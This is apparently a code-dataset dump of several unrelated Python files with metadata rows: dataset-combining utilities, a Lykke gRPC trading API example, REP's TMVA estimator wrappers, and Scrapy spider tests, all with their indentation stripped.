self.zip_transform = zip_transform
@property
def sizes(self):
return tuple([len(ds) for ds in self.datasets])
def __len__(self):
return min(self.sizes)
def __getitem__(self, idx):
array = []
for ds in self.datasets:
array.append(ds[idx])
if self.zip_transform is None:
return tuple(array)
return self.zip_transform(tuple(array))
class ZipIterableDataset(IterableDataset):
__slots__ = ["datasets", "zip_transform"]
def __init__(self, datasets, zip_transform=None):
assert len(datasets) > 0
from collections import Iterable
assert all([isinstance(ds, Iterable) for ds in datasets])
assert callable(zip_transform) or zip_transform is None
self.datasets = datasets
self.zip_transform = zip_transform
@staticmethod
def generator(datasets, zip_transform):
if zip_transform is None:
zip_transform = (lambda x: x)
for vals in zip(*datasets):
yield zip_transform(vals)
def __iter__(self):
return self.generator(self.datasets, self.zip_transform)
class CombineDataset(Dataset):
__slots__ = ["datasets", "comb_transform"]
def __init__(self, datasets, comb_transform=None, indexer=None):
assert len(datasets) > 0
assert all([callable(getattr(ds, "__len__", None)) for ds in datasets])
assert all([callable(getattr(ds, "__getitem__", None)) for ds in datasets])
assert callable(comb_transform) or comb_transform is None
self.datasets = datasets
self.comb_transform = comb_transform
if callable(indexer):
self.indexer = indexer
@staticmethod
def indexer(i, sizes):
prod = 1
for s in sizes:
prod *= s
out = []
for s in sizes:
prod //= s
q = i // prod
i = i % prod
out.append(q)
return tuple(out)
@property
def sizes(self):
return tuple([len(ds) for ds in self.datasets])
def __len__(self):
from functools import reduce
from operator import mul
return reduce(mul, self.sizes, 1)
def __getitem__(self, idx):
idxs = self.indexer(idx, self.sizes)
array = []
for i, ds in zip(idxs, self.datasets):
array.append(ds[i])
if self.comb_transform is None:
return tuple(array)
return self.comb_transform(tuple(array))
class CombineIterableDataset(IterableDataset):
__slots__ = ["datasets", "comb_transform"]
def __init__(self, datasets, comb_transform, indexer=None):
assert len(datasets) > 0
from collections import Iterable
assert all([isinstance(ds, Iterable) for ds in datasets])
assert callable(comb_transform) or comb_transform is None
self.datasets = datasets
self.comb_transform = comb_transform
if callable(indexer):
self.indexer = indexer
@staticmethod
def generator(datasets, comb_transform):
if comb_transform is None:
comb_transform = (lambda x: x)
from itertools import product
for vals in product(*datasets):
yield comb_transform(vals)
def __iter__(self):
return self.generator(self.datasets, self.comb_transform)
class AugmentedDataset(IterableDataset):
__slots__ = ["values", "augment"]
def __init__(self, values, augment):
from collections import Iterable
assert isinstance(values, Iterable)
assert callable(augment) or augment is None
self.values = values
self.augment = augment
@staticmethod
def generator(values, augment):
if augment is None:
augment = (lambda x: [x])
for v in values:
for o in augment(v):
yield o
def __iter__(self):
return self.generator(self.values, self.augment)
class CachedDataset(Dataset):
__slots__ = ["dataset", "cache"]
def __init__(self, dataset, cache):
assert callable(getattr(dataset, "__len__", None))
assert callable(getattr(dataset, "__getitem__", None))
assert callable(getattr(cache, "__getitem__", None))
assert callable(getattr(cache, "__setitem__", None))
assert callable(getattr(cache, "__contains__", None))
self.dataset = dataset
self.cache = cache
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
if idx not in self.cache:
self.cache[idx] = self.dataset[idx]
return self.cache[idx]
| 26.518828 | 83 | 0.627643 |
c67617ebe832e48424c4cc75e187674aac96f8fe | 2,042 | py | Python | Examples/Python/api/main.py | LykkeCity/Trading-API | 6d9d7ee07865acc25422b1f86c575857e3cc2cc4 | [
"Apache-2.0"
] | null | null | null | Examples/Python/api/main.py | LykkeCity/Trading-API | 6d9d7ee07865acc25422b1f86c575857e3cc2cc4 | [
"Apache-2.0"
] | 5 | 2020-10-20T06:41:11.000Z | 2021-11-29T21:55:51.000Z | Examples/Python/api/main.py | LykkeCity/Trading-API | 6d9d7ee07865acc25422b1f86c575857e3cc2cc4 | [
"Apache-2.0"
] | 7 | 2020-07-23T09:54:21.000Z | 2022-02-04T06:49:19.000Z | import grpc
import common_pb2
import common_pb2_grpc
import privateService_pb2
import privateService_pb2_grpc
import publicService_pb2
import publicService_pb2_grpc
import google.protobuf
ssl_credentials = grpc.ssl_channel_credentials()
# use auth creds
token_credentials = grpc.access_token_call_credentials("HFT-ACCOUNT-API-KEY")
# aggregate creds
credentials = grpc.composite_channel_credentials(ssl_credentials, token_credentials)
# create a channel
channel = grpc.secure_channel("hft-apiv2-grpc.lykke.com:443", credentials)
private_api = privateService_pb2_grpc.PrivateServiceStub(channel)
public_api = publicService_pb2_grpc.PublicServiceStub(channel)
def get_balances():
balances = private_api.GetBalances(google.protobuf.empty_pb2.Empty())
for balance in balances.payload:
print(f"{balance.assetId}: {balance.available}")
def place_cancel_order():
request = privateService_pb2.LimitOrderRequest()
request.assetPairId = "ETHUSD"
request.side = 1 #sell
request.volume = "0.01"
request.price = "100000"
response = private_api.PlaceLimitOrder(request)
print(f"orderId: {response.payload.orderId}")
cancel_request = privateService_pb2.CancelOrderRequest()
cancel_request.orderId = response.payload.orderId
cancel_response = private_api.CancelOrder(cancel_request)
print(f"Order cancel response: {cancel_response.payload}")
def get_quotes():
request = publicService_pb2.PriceUpdatesRequest();
request.assetPairIds.extend(["BTCUSD", "BTCEUR"]) # or [] for all asset pairs
stream = public_api.GetPriceUpdates(request)
try:
for price in stream:
print(f"{price.assetPairId} bid: {price.bid}, ask: {price.ask}, timestamp: {price.timestamp.ToDatetime()}")
except KeyboardInterrupt:
stream.cancel()
def get_trades():
stream = private_api.GetTradeUpdates(google.protobuf.empty_pb2.Empty())
try:
for trade in stream:
print(str(trade))
except Exception as e:
print(str(e))
stream.cancel()
get_balances()
#place_cancel_order
#get_quotes()
#get_trades()
| 27.226667 | 113 | 0.77522 |
c1a6b6069286b247c56f516a0555650e9e86849c | 17,743 | py | Python | rep/estimators/tmva.py | HolyBayes/rep | 8a8d70f87e148e6fd73ff0c3a8606e6074a5c47b | [
"Apache-2.0"
] | null | null | null | rep/estimators/tmva.py | HolyBayes/rep | 8a8d70f87e148e6fd73ff0c3a8606e6074a5c47b | [
"Apache-2.0"
] | null | null | null | rep/estimators/tmva.py | HolyBayes/rep | 8a8d70f87e148e6fd73ff0c3a8606e6074a5c47b | [
"Apache-2.0"
] | null | null | null | """
These classes are wrappers for physics machine learning library TMVA used .root format files (c++ library).
Now you can simply use it in python. TMVA contains classification and regression algorithms, including neural networks.
See `TMVA guide <http://mirror.yandex.ru/gentoo-distfiles/distfiles/TMVAUsersGuide-v4.03.pdf>`_
for the list of the available algorithms and parameters.
"""
from __future__ import division, print_function, absolute_import
from abc import ABCMeta
from logging import getLogger
import os
import tempfile
import subprocess
from subprocess import PIPE
import shutil
import sys
from .interface import Classifier, Regressor
from .utils import check_inputs, score_to_proba, proba_to_two_dimensions
from six.moves import cPickle
import signal
__author__ = 'Tatiana Likhomanenko, Alex Rogozhnikov'
logger = getLogger(__name__)
# those parameters that shall not be passed to the options of the TMVA estimators
_IGNORED_PARAMETERS = {'random_state'}
__all__ = ['TMVAClassifier', 'TMVARegressor']
class _AdditionalInformation:
"""
Additional information for the tmva factory (used in training)
"""
def __init__(self, directory, model_type='classification'):
self.directory = directory
self.tmva_root = 'result.root'
self.tmva_job = "TMVAEstimation"
self.model_type = model_type
class _AdditionalInformationPredict:
"""
Additional information for the tmva factory (used to predict new data)
"""
def __init__(self, directory, xml_file, method_name, model_type=('classification', None)):
self.directory = directory
self.xml_file = xml_file
self.method_name = method_name
self.model_type = model_type
self.result_filename = os.path.join(directory, 'dump_predictions.pkl')
class TMVABase(object):
"""
TMVABase is a base class for the tmva classification and regression models.
:param str method: algorithm method (default='kBDT')
:param features: features used in training
:type features: list[str] or None
:param str factory_options: system options, including data transformation before training
:param dict method_parameters: estimator options
.. note:: TMVA doesn't support staged predictions and features importances :(
"""
__metaclass__ = ABCMeta
def __init__(self,
factory_options="",
method='kBDT',
**method_parameters):
self.method = method
self._method_name = 'REP_Estimator'
self.factory_options = factory_options
self.method_parameters = method_parameters
# contents of xml file with formula, read into memory
self.formula_xml = None
@staticmethod
def _create_tmp_directory():
return tempfile.mkdtemp(dir=os.getcwd())
@staticmethod
def _remove_tmp_directory(directory):
shutil.rmtree(directory, ignore_errors=True)
def _fit(self, X, y, sample_weight=None, model_type='classification'):
"""
Train the estimator.
:param pandas.DataFrame X: data shape [n_samples, n_features]
:param y: targets for samples --- array-like of shape [n_samples]
:param sample_weight: weights for samples,
array-like of shape [n_samples] or None if all weights are equal
:return: self
"""
# saving data to 2 different root files.
directory = self._create_tmp_directory()
add_info = _AdditionalInformation(directory, model_type=model_type)
try:
self._run_tmva_training(add_info, X, y, sample_weight)
finally:
self._remove_tmp_directory(directory)
if self.formula_xml is None: self.formula_xml = ''
return self
def _run_tmva_training(self, info, X, y, sample_weight):
"""
Run subprocess to train tmva factory.
:param info: class with additional information
"""
tmva_process = None
_platform = sys.platform
try:
if _platform == 'win32' or _platform == 'cygwin':
tmva_process = subprocess.Popen(
'{executable} -c "import os; from rep.estimators import _tmvaFactory; _tmvaFactory.main()"'.format(
executable=sys.executable),
cwd=info.directory,
stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)
else:
# Problem with Mac OS El Capitan which is not garanteed to set DYLD_LIBRARY_PATH.
# This DYLD_LIBRARY_PATH can be used in root_numpy for dynamic loading ROOT libraries
# https://github.com/rootpy/root_numpy/issues/227#issuecomment-165981891
tmva_process = subprocess.Popen(
'export DYLD_LIBRARY_PATH={dyld}; cd "{directory}";'
'{executable} -c "import os; from rep.estimators import _tmvaFactory; _tmvaFactory.main()"'.format(
dyld=os.environ.get('DYLD_LIBRARY_PATH', ""),
directory=info.directory,
executable=sys.executable),
stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT,
shell=True, preexec_fn=os.setsid)
try:
cPickle.dump(self, tmva_process.stdin)
cPickle.dump(info, tmva_process.stdin)
cPickle.dump(X, tmva_process.stdin)
cPickle.dump(y, tmva_process.stdin)
cPickle.dump(sample_weight, tmva_process.stdin)
except:
# continuing, next we check the output of process
pass
stdout, stderr = tmva_process.communicate()
assert tmva_process.returncode == 0, \
'ERROR: TMVA process is incorrect finished \n LOG: %s \n %s' % (stderr, stdout)
if stdout is not None:
print('%s' % (stdout))
xml_filename = os.path.join(info.directory, 'weights',
'{job}_{name}.weights.xml'.format(job=info.tmva_job, name=self._method_name))
with open(xml_filename, 'r') as xml_file:
self.formula_xml = xml_file.read()
finally:
if tmva_process is not None:
try:
if _platform == 'win32' or _platform == 'cygwin':
subprocess.call(['taskkill', '/F', '/T', '/PID', str(tmva_process.pid)])
else:
os.killpg(tmva_process.pid, signal.SIGTERM)
except:
pass
def _check_fitted(self):
assert self.formula_xml is not None, "Classifier wasn't fitted, please call `fit` first"
def _predict(self, X, model_type=('classification', None)):
"""
Predict data
:param pandas.DataFrame X: data shape [n_samples, n_features]
:param model_type: (classification/regression, type of output transformation)
:return: predicted values of shape [n_samples]
"""
self._check_fitted()
directory = self._create_tmp_directory()
try:
with tempfile.NamedTemporaryFile(mode="w", suffix='.xml', dir=directory, delete=True) as file_xml:
file_xml.write(self.formula_xml)
file_xml.flush()
add_info = _AdditionalInformationPredict(directory, file_xml.name, self._method_name,
model_type=model_type)
prediction = self._run_tmva_predict(add_info, X)
finally:
self._remove_tmp_directory(directory)
return prediction
@staticmethod
def _run_tmva_predict(info, data):
"""
Run subprocess to predict new data by tmva factory
:param info: class with additional information
"""
tmva_process = None
_platform = sys.platform
try:
if _platform == 'win32' or _platform == 'cygwin':
tmva_process = subprocess.Popen(
'{executable} -c "from rep.estimators import _tmvaReader; _tmvaReader.main()"'.format(
executable=sys.executable),
cwd=info.directory,
stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)
else:
# Problem with Mac OS El Capitan (10.11) which is not guaranteed to set DYLD_LIBRARY_PATH.
# This DYLD_LIBRARY_PATH can be used in root_numpy for dynamic loading ROOT libraries
# https://github.com/rootpy/root_numpy/issues/227#issuecomment-165981891
tmva_process = subprocess.Popen(
'export DYLD_LIBRARY_PATH={dyld}; cd "{directory}";'
'{executable} -c "from rep.estimators import _tmvaReader; _tmvaReader.main()"'.format(
dyld=os.environ.get('DYLD_LIBRARY_PATH', ""),
directory=info.directory,
executable=sys.executable),
stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT,
shell=True)
try:
cPickle.dump(info, tmva_process.stdin)
cPickle.dump(data, tmva_process.stdin)
except:
# Doing nothing, there is check later.
pass
stdout, stderr = tmva_process.communicate()
assert tmva_process.returncode == 0, \
'ERROR: TMVA process is incorrect finished \n LOG: %s \n %s' % (stderr, stdout)
with open(info.result_filename, 'rb') as predictions_file:
predictions = cPickle.load(predictions_file)
return predictions
finally:
if tmva_process is not None:
try:
if _platform == 'win32' or _platform == 'cygwin':
subprocess.call(['taskkill', '/F', '/T', '/PID', str(tmva_process.pid)])
else:
os.killpg(tmva_process.pid, signal.SIGTERM)
except:
pass
class TMVAClassifier(TMVABase, Classifier):
"""
Implements classification models from TMVA library: CERN library for machine learning.
:param str method: algorithm method (default='kBDT')
:param features: features used in training
:type features: list[str] or None
:param str factory_options: system options, including data transformations before training, for example::
"!V:!Silent:Color:Transformations=I;D;P;G,D"
:param str sigmoid_function: function which is used to convert TMVA output to probabilities;
* *identity* (use for svm, mlp) --- do not transform the output, use this value for methods returning class probabilities
* *sigmoid* --- sigmoid transformation, use it if output varies in range [-infinity, +infinity]
* *bdt* (for the BDT algorithms output varies in range [-1, 1])
* *sig_eff=0.4* --- for the rectangular cut optimization methods,
for instance, here 0.4 will be used as a signal efficiency to evaluate MVA,
(put any float number from [0, 1])
:param dict method_parameters: classifier options, example: `NTrees=100`, `BoostType='Grad'`.
.. warning::
TMVA doesn't support *staged_predict_proba()* and *feature_importances__*.
TMVA doesn't support multiclassification, only two-class classification.
`TMVA guide <http://mirror.yandex.ru/gentoo-distfiles/distfiles/TMVAUsersGuide-v4.03.pdf>`_.
"""
def __init__(self,
method='kBDT',
features=None,
factory_options="",
sigmoid_function='bdt',
**method_parameters):
TMVABase.__init__(self, factory_options=factory_options, method=method, **method_parameters)
Classifier.__init__(self, features=features)
self.sigmoid_function = sigmoid_function
def _set_classes_special(self, y):
self._set_classes(y)
assert self.n_classes_ == 2, "Support only 2 classes (data contain {})".format(self.n_classes_)
def set_params(self, **params):
"""
Set the parameters of this estimator.
:param dict params: parameters to set in the model
"""
for k, v in params.items():
if hasattr(self, k):
setattr(self, k, v)
else:
if k in _IGNORED_PARAMETERS:
continue
self.method_parameters[k] = v
def get_params(self, deep=True):
"""
Get parameters for this estimator.
:return: dict, parameter names mapped to their values.
"""
parameters = self.method_parameters.copy()
parameters['method'] = self.method
parameters['factory_options'] = self.factory_options
parameters['features'] = self.features
return parameters
def fit(self, X, y, sample_weight=None):
X, y, sample_weight = check_inputs(X, y, sample_weight=sample_weight, allow_none_weights=False)
X = self._get_features(X).copy()
self._set_classes_special(y)
if self.n_classes_ == 2:
self.factory_options = '{}:AnalysisType=Classification'.format(self.factory_options)
else:
self.factory_options = '{}:AnalysisType=Multiclass'.format(self.factory_options)
return self._fit(X, y, sample_weight=sample_weight)
fit.__doc__ = Classifier.fit.__doc__
def predict_proba(self, X):
X = self._get_features(X)
prediction = self._predict(X, model_type=('classification', self.sigmoid_function))
return self._convert_output(prediction)
predict_proba.__doc__ = Classifier.predict_proba.__doc__
def _convert_output(self, prediction):
"""
Convert the output to the probabilities for each class.
:param array prediction: predictions which will be converted
:return: probabilities
"""
variants = {'bdt', 'sigmoid', 'identity'}
if 'sig_eff' in self.sigmoid_function:
return proba_to_two_dimensions(prediction)
assert self.sigmoid_function in variants, \
'sigmoid_function parameter must be one of {}, instead of {}'.format(variants, self.sigmoid_function)
if self.sigmoid_function == 'sigmoid':
return score_to_proba(prediction)
elif self.sigmoid_function == 'bdt':
return proba_to_two_dimensions((prediction + 1.) / 2.)
else:
return proba_to_two_dimensions(prediction)
def staged_predict_proba(self, X):
"""
.. warning:: This function is not supported for the TMVA library (**AttributeError** will be thrown)
"""
raise AttributeError("'staged_predict_proba' is not supported by the TMVA library")
class TMVARegressor(TMVABase, Regressor):
"""
Implements regression models from TMVA library: CERN library for machine learning.
:param str method: algorithm method (default='kBDT')
:param features: features used in training
:type features: list[str] or None
:param str factory_options: system options, including data transformations before training, for example::
"!V:!Silent:Color:Transformations=I;D;P;G,D"
:param dict method_parameters: regressor options, for example: `NTrees=100`, `BoostType='Grad'`
.. warning::
TMVA doesn't support *staged_predict()* and *feature_importances__*.
`TMVA guide <http://mirror.yandex.ru/gentoo-distfiles/distfiles/TMVAUsersGuide-v4.03.pdf>`_
"""
def __init__(self,
method='kBDT',
features=None,
factory_options="",
**method_parameters):
TMVABase.__init__(self, factory_options=factory_options, method=method, **method_parameters)
Regressor.__init__(self, features=features)
def set_params(self, **params):
"""
Set the parameters of this estimator.
:param dict params: parameters to set in the model
"""
for k, v in params.items():
if hasattr(self, k):
setattr(self, k, v)
else:
if k in _IGNORED_PARAMETERS:
continue
self.method_parameters[k] = v
def get_params(self, deep=True):
"""
Get parameters for this estimator.
:return: dict, parameter names mapped to their values.
"""
parameters = self.method_parameters.copy()
parameters['method'] = self.method
parameters['factory_options'] = self.factory_options
parameters['features'] = self.features
return parameters
def fit(self, X, y, sample_weight=None):
X, y, sample_weight = check_inputs(X, y, sample_weight=sample_weight, allow_none_weights=False)
X = self._get_features(X).copy()
self.factory_options = '{}:AnalysisType=Regression'.format(self.factory_options)
return self._fit(X, y, sample_weight=sample_weight, model_type='regression')
fit.__doc__ = Regressor.fit.__doc__
def predict(self, X):
X = self._get_features(X)
return self._predict(X, model_type=('regression', None))
predict.__doc__ = Regressor.predict.__doc__
def staged_predict(self, X):
"""
.. warning:: This function is not supported for the TMVA library (**AttributeError** will be thrown)
"""
raise AttributeError("'staged_predict' is not supported by the TMVA library")
| 40.976905 | 129 | 0.619963 |
f26da233415b2d91e06f752c11d037acafbcde62 | 17,944 | py | Python | tests/test_spider.py | Maransatto/scrapy | 886513c3751b92e42dcc8cb180d4c15a5a11ccaf | [
"BSD-3-Clause"
] | 3 | 2018-11-13T03:01:17.000Z | 2018-11-13T03:01:20.000Z | tests/test_spider.py | Maransatto/scrapy | 886513c3751b92e42dcc8cb180d4c15a5a11ccaf | [
"BSD-3-Clause"
] | 2 | 2021-09-20T19:54:11.000Z | 2022-03-22T20:43:28.000Z | tests/test_spider.py | Maransatto/scrapy | 886513c3751b92e42dcc8cb180d4c15a5a11ccaf | [
"BSD-3-Clause"
] | 1 | 2021-03-30T13:11:34.000Z | 2021-03-30T13:11:34.000Z | import gzip
import inspect
import warnings
from io import BytesIO
from testfixtures import LogCapture
from twisted.trial import unittest
from scrapy import signals
from scrapy.settings import Settings
from scrapy.http import Request, Response, TextResponse, XmlResponse, HtmlResponse
from scrapy.spiders.init import InitSpider
from scrapy.spiders import Spider, BaseSpider, CrawlSpider, Rule, XMLFeedSpider, \
CSVFeedSpider, SitemapSpider
from scrapy.linkextractors import LinkExtractor
from scrapy.exceptions import ScrapyDeprecationWarning
from scrapy.utils.trackref import object_ref
from scrapy.utils.test import get_crawler
from tests import mock
class SpiderTest(unittest.TestCase):
spider_class = Spider
def setUp(self):
warnings.simplefilter("always")
def tearDown(self):
warnings.resetwarnings()
def test_base_spider(self):
spider = self.spider_class("example.com")
self.assertEqual(spider.name, 'example.com')
self.assertEqual(spider.start_urls, [])
def test_start_requests(self):
spider = self.spider_class('example.com')
start_requests = spider.start_requests()
self.assertTrue(inspect.isgenerator(start_requests))
self.assertEqual(list(start_requests), [])
def test_spider_args(self):
"""Constructor arguments are assigned to spider attributes"""
spider = self.spider_class('example.com', foo='bar')
self.assertEqual(spider.foo, 'bar')
def test_spider_without_name(self):
"""Constructor arguments are assigned to spider attributes"""
self.assertRaises(ValueError, self.spider_class)
self.assertRaises(ValueError, self.spider_class, somearg='foo')
def test_deprecated_set_crawler_method(self):
spider = self.spider_class('example.com')
crawler = get_crawler()
with warnings.catch_warnings(record=True) as w:
spider.set_crawler(crawler)
self.assertIn("set_crawler", str(w[0].message))
self.assertTrue(hasattr(spider, 'crawler'))
self.assertIs(spider.crawler, crawler)
self.assertTrue(hasattr(spider, 'settings'))
self.assertIs(spider.settings, crawler.settings)
def test_from_crawler_crawler_and_settings_population(self):
crawler = get_crawler()
spider = self.spider_class.from_crawler(crawler, 'example.com')
self.assertTrue(hasattr(spider, 'crawler'))
self.assertIs(spider.crawler, crawler)
self.assertTrue(hasattr(spider, 'settings'))
self.assertIs(spider.settings, crawler.settings)
def test_from_crawler_init_call(self):
with mock.patch.object(self.spider_class, '__init__',
return_value=None) as mock_init:
self.spider_class.from_crawler(get_crawler(), 'example.com',
foo='bar')
mock_init.assert_called_once_with('example.com', foo='bar')
def test_closed_signal_call(self):
class TestSpider(self.spider_class):
closed_called = False
def closed(self, reason):
self.closed_called = True
crawler = get_crawler()
spider = TestSpider.from_crawler(crawler, 'example.com')
crawler.signals.send_catch_log(signal=signals.spider_opened,
spider=spider)
crawler.signals.send_catch_log(signal=signals.spider_closed,
spider=spider, reason=None)
self.assertTrue(spider.closed_called)
def test_update_settings(self):
spider_settings = {'TEST1': 'spider', 'TEST2': 'spider'}
project_settings = {'TEST1': 'project', 'TEST3': 'project'}
self.spider_class.custom_settings = spider_settings
settings = Settings(project_settings, priority='project')
self.spider_class.update_settings(settings)
self.assertEqual(settings.get('TEST1'), 'spider')
self.assertEqual(settings.get('TEST2'), 'spider')
self.assertEqual(settings.get('TEST3'), 'project')
def test_logger(self):
spider = self.spider_class('example.com')
with LogCapture() as l:
spider.logger.info('test log msg')
l.check(('example.com', 'INFO', 'test log msg'))
record = l.records[0]
self.assertIn('spider', record.__dict__)
self.assertIs(record.spider, spider)
def test_log(self):
spider = self.spider_class('example.com')
with mock.patch('scrapy.spiders.Spider.logger') as mock_logger:
spider.log('test log msg', 'INFO')
mock_logger.log.assert_called_once_with('INFO', 'test log msg')
class InitSpiderTest(SpiderTest):
spider_class = InitSpider
class XMLFeedSpiderTest(SpiderTest):
spider_class = XMLFeedSpider
def test_register_namespace(self):
body = b"""<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns:x="http://www.google.com/schemas/sitemap/0.84"
xmlns:y="http://www.example.com/schemas/extras/1.0">
<url><x:loc>http://www.example.com/Special-Offers.html</loc><y:updated>2009-08-16</updated><other value="bar" y:custom="fuu"/></url>
<url><loc>http://www.example.com/</loc><y:updated>2009-08-16</updated><other value="foo"/></url>
</urlset>"""
response = XmlResponse(url='http://example.com/sitemap.xml', body=body)
class _XMLSpider(self.spider_class):
itertag = 'url'
namespaces = (
('a', 'http://www.google.com/schemas/sitemap/0.84'),
('b', 'http://www.example.com/schemas/extras/1.0'),
)
def parse_node(self, response, selector):
yield {
'loc': selector.xpath('a:loc/text()').getall(),
'updated': selector.xpath('b:updated/text()').getall(),
'other': selector.xpath('other/@value').getall(),
'custom': selector.xpath('other/@b:custom').getall(),
}
for iterator in ('iternodes', 'xml'):
spider = _XMLSpider('example', iterator=iterator)
output = list(spider.parse(response))
self.assertEqual(len(output), 2, iterator)
self.assertEqual(output, [
{'loc': [u'http://www.example.com/Special-Offers.html'],
'updated': [u'2009-08-16'],
'custom': [u'fuu'],
'other': [u'bar']},
{'loc': [],
'updated': [u'2009-08-16'],
'other': [u'foo'],
'custom': []},
], iterator)
class CSVFeedSpiderTest(SpiderTest):
spider_class = CSVFeedSpider
class CrawlSpiderTest(SpiderTest):
test_body = b"""<html><head><title>Page title<title>
<body>
<p><a href="item/12.html">Item 12</a></p>
<div class='links'>
<p><a href="/about.html">About us</a></p>
</div>
<div>
<p><a href="/nofollow.html">This shouldn't be followed</a></p>
</div>
</body></html>"""
spider_class = CrawlSpider
def test_process_links(self):
response = HtmlResponse("http://example.org/somepage/index.html",
body=self.test_body)
class _CrawlSpider(self.spider_class):
name="test"
allowed_domains=['example.org']
rules = (
Rule(LinkExtractor(), process_links="dummy_process_links"),
)
def dummy_process_links(self, links):
return links
spider = _CrawlSpider()
output = list(spider._requests_to_follow(response))
self.assertEqual(len(output), 3)
self.assertTrue(all(map(lambda r: isinstance(r, Request), output)))
self.assertEqual([r.url for r in output],
['http://example.org/somepage/item/12.html',
'http://example.org/about.html',
'http://example.org/nofollow.html'])
def test_process_links_filter(self):
response = HtmlResponse("http://example.org/somepage/index.html",
body=self.test_body)
class _CrawlSpider(self.spider_class):
import re
name="test"
allowed_domains=['example.org']
rules = (
Rule(LinkExtractor(), process_links="filter_process_links"),
)
_test_regex = re.compile('nofollow')
def filter_process_links(self, links):
return [link for link in links
if not self._test_regex.search(link.url)]
spider = _CrawlSpider()
output = list(spider._requests_to_follow(response))
self.assertEqual(len(output), 2)
self.assertTrue(all(map(lambda r: isinstance(r, Request), output)))
self.assertEqual([r.url for r in output],
['http://example.org/somepage/item/12.html',
'http://example.org/about.html'])
def test_process_links_generator(self):
response = HtmlResponse("http://example.org/somepage/index.html",
body=self.test_body)
class _CrawlSpider(self.spider_class):
name="test"
allowed_domains=['example.org']
rules = (
Rule(LinkExtractor(), process_links="dummy_process_links"),
)
def dummy_process_links(self, links):
for link in links:
yield link
spider = _CrawlSpider()
output = list(spider._requests_to_follow(response))
self.assertEqual(len(output), 3)
self.assertTrue(all(map(lambda r: isinstance(r, Request), output)))
self.assertEqual([r.url for r in output],
['http://example.org/somepage/item/12.html',
'http://example.org/about.html',
'http://example.org/nofollow.html'])
def test_follow_links_attribute_population(self):
crawler = get_crawler()
spider = self.spider_class.from_crawler(crawler, 'example.com')
self.assertTrue(hasattr(spider, '_follow_links'))
self.assertTrue(spider._follow_links)
settings_dict = {'CRAWLSPIDER_FOLLOW_LINKS': False}
crawler = get_crawler(settings_dict=settings_dict)
spider = self.spider_class.from_crawler(crawler, 'example.com')
self.assertTrue(hasattr(spider, '_follow_links'))
self.assertFalse(spider._follow_links)
def test_follow_links_attribute_deprecated_population(self):
spider = self.spider_class('example.com')
self.assertFalse(hasattr(spider, '_follow_links'))
spider.set_crawler(get_crawler())
self.assertTrue(hasattr(spider, '_follow_links'))
self.assertTrue(spider._follow_links)
spider = self.spider_class('example.com')
settings_dict = {'CRAWLSPIDER_FOLLOW_LINKS': False}
spider.set_crawler(get_crawler(settings_dict=settings_dict))
self.assertTrue(hasattr(spider, '_follow_links'))
self.assertFalse(spider._follow_links)
class SitemapSpiderTest(SpiderTest):
spider_class = SitemapSpider
BODY = b"SITEMAP"
f = BytesIO()
g = gzip.GzipFile(fileobj=f, mode='w+b')
g.write(BODY)
g.close()
GZBODY = f.getvalue()
def assertSitemapBody(self, response, body):
spider = self.spider_class("example.com")
self.assertEqual(spider._get_sitemap_body(response), body)
def test_get_sitemap_body(self):
r = XmlResponse(url="http://www.example.com/", body=self.BODY)
self.assertSitemapBody(r, self.BODY)
r = HtmlResponse(url="http://www.example.com/", body=self.BODY)
self.assertSitemapBody(r, None)
r = Response(url="http://www.example.com/favicon.ico", body=self.BODY)
self.assertSitemapBody(r, None)
def test_get_sitemap_body_gzip_headers(self):
r = Response(url="http://www.example.com/sitemap", body=self.GZBODY,
headers={"content-type": "application/gzip"})
self.assertSitemapBody(r, self.BODY)
def test_get_sitemap_body_xml_url(self):
r = TextResponse(url="http://www.example.com/sitemap.xml", body=self.BODY)
self.assertSitemapBody(r, self.BODY)
def test_get_sitemap_body_xml_url_compressed(self):
r = Response(url="http://www.example.com/sitemap.xml.gz", body=self.GZBODY)
self.assertSitemapBody(r, self.BODY)
# .xml.gz but body decoded by HttpCompression middleware already
r = Response(url="http://www.example.com/sitemap.xml.gz", body=self.BODY)
self.assertSitemapBody(r, self.BODY)
def test_get_sitemap_urls_from_robotstxt(self):
robots = b"""# Sitemap files
Sitemap: http://example.com/sitemap.xml
Sitemap: http://example.com/sitemap-product-index.xml
Sitemap: HTTP://example.com/sitemap-uppercase.xml
Sitemap: /sitemap-relative-url.xml
"""
r = TextResponse(url="http://www.example.com/robots.txt", body=robots)
spider = self.spider_class("example.com")
self.assertEqual([req.url for req in spider._parse_sitemap(r)],
['http://example.com/sitemap.xml',
'http://example.com/sitemap-product-index.xml',
'http://example.com/sitemap-uppercase.xml',
'http://www.example.com/sitemap-relative-url.xml'])
def test_alternate_url_locs(self):
sitemap = b"""<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xhtml="http://www.w3.org/1999/xhtml">
<url>
<loc>http://www.example.com/english/</loc>
<xhtml:link rel="alternate" hreflang="de"
href="http://www.example.com/deutsch/"/>
<xhtml:link rel="alternate" hreflang="de-ch"
href="http://www.example.com/schweiz-deutsch/"/>
<xhtml:link rel="alternate" hreflang="it"
href="http://www.example.com/italiano/"/>
<xhtml:link rel="alternate" hreflang="it"/><!-- wrong tag without href -->
</url>
</urlset>"""
r = TextResponse(url="http://www.example.com/sitemap.xml", body=sitemap)
spider = self.spider_class("example.com")
self.assertEqual([req.url for req in spider._parse_sitemap(r)],
['http://www.example.com/english/'])
spider.sitemap_alternate_links = True
self.assertEqual([req.url for req in spider._parse_sitemap(r)],
['http://www.example.com/english/',
'http://www.example.com/deutsch/',
'http://www.example.com/schweiz-deutsch/',
'http://www.example.com/italiano/'])
class DeprecationTest(unittest.TestCase):
def test_basespider_is_deprecated(self):
with warnings.catch_warnings(record=True) as w:
class MySpider1(BaseSpider):
pass
self.assertEqual(len(w), 1)
self.assertEqual(w[0].category, ScrapyDeprecationWarning)
self.assertEqual(w[0].lineno, inspect.getsourcelines(MySpider1)[1])
def test_basespider_issubclass(self):
class MySpider2(Spider):
pass
class MySpider2a(MySpider2):
pass
class Foo(object):
pass
class Foo2(object_ref):
pass
assert issubclass(MySpider2, BaseSpider)
assert issubclass(MySpider2a, BaseSpider)
assert not issubclass(Foo, BaseSpider)
assert not issubclass(Foo2, BaseSpider)
def test_basespider_isinstance(self):
